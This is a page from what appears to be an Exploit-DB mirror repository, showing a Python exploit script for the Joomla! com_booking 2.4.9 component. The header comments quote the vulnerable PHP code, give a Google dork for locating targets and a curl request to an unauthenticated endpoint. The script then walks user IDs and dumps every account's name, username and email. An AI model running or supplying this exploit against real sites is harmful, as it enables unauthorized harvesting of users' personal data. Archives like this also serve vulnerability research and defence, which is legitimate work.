bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51595.py
Exploit-DB 3a3c03321c DB: 2023-07-20 
18 changes to exploits/shellcodes/ghdb

Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution

ABB FlowX v4.00 - Exposure of Sensitive Information

TP-Link TL-WR740N - Authenticated Directory Transversal

Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure

Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
Blackcat Cms v1.4 - Remote Code Execution (RCE)
Blackcat Cms v1.4 - Stored XSS
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
CmsMadeSimple v2.2.17 - Stored Cross-Site Scripting (XSS)

Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)

Online Piggery Management System v1.0 - unauthenticated file upload vulnerability

phpfm v1.7.9 - Authentication type juggling

PimpMyLog v1.7.14 - Improper access control

PMB 7.4.6 - SQL Injection

Statamic 4.7.0 - File-Inclusion

Vaidya-Mitra 1.0 - Multiple SQLi
2023-07-20 00:16:46 +00:00

100 lines
No EOL
2.6 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)
# Google Dork: inurl:"index.php?option=com_booking"
# Date: 07/12/2023
# Exploit Author: qw3rTyTy
# Vendor Homepage: http://www.artio.net/
# Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
# Version: 2.4.9
# Tested on: Slackware/Nginx/Joomla! 3.10.11
#
##
# File: site/booking.php
#
# <?php
# [...]
#18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php');
# [...]
#
# File: admin/booking.php
#
# <?php
# [...]
#104 if (class_exists(($classname = AImporter::controller()))) {
#105 $controller = new $classname();
#106 /* @var $controller JController */
#107 $controller->execute(JRequest::getVar('task'));
#108 $controller->redirect();
#109 }
# [...]
#
# File: admin/controllers/customer.php
#
# <?php
# [...]
#240 function getUserData() {
#241 $user = JFactory::getUser(JRequest::getInt('id'));
#242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email);
#243 die(json_encode($data));
#244 }
# [...]
#
# A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'.
#
# curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123
#
# So, an attacker can easily enumerate all accounts by bruteforcing.
#
##
import argparse
import urllib.parse
import requests
from sys import exit
from time import sleep
def enumerateAccounts(options):
i = 1
url = options.url
url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id="
while True:
try:
response = requests.get("{}{}".format(url, str(i)))
if response.status_code == 200:
try:
jsondocument = response.json()
if jsondocument["name"] != None:
print(jsondocument)
except requests.exceptions.JSONDecodeError:
raise
else:
break
except Exception as ex:
print(ex)
break
i += 1
def main():
p = argparse.ArgumentParser()
p.add_argument("-u", "--url", type=str, required=True)
parsed = p.parse_args()
try:
t = urllib.parse.urlparse(parsed.url)
except ValueError as ex:
print(ex)
exit()
if not t[0].startswith("http") and not t[0].startswith("https"):
print("Improper URL given.")
exit()
if len(t[1]) == 0:
print("Improper URL given.")
exit()
enumerateAccounts(parsed)
if __name__ == "__main__":
main()
Reference in a new issue View git blame Copy permalink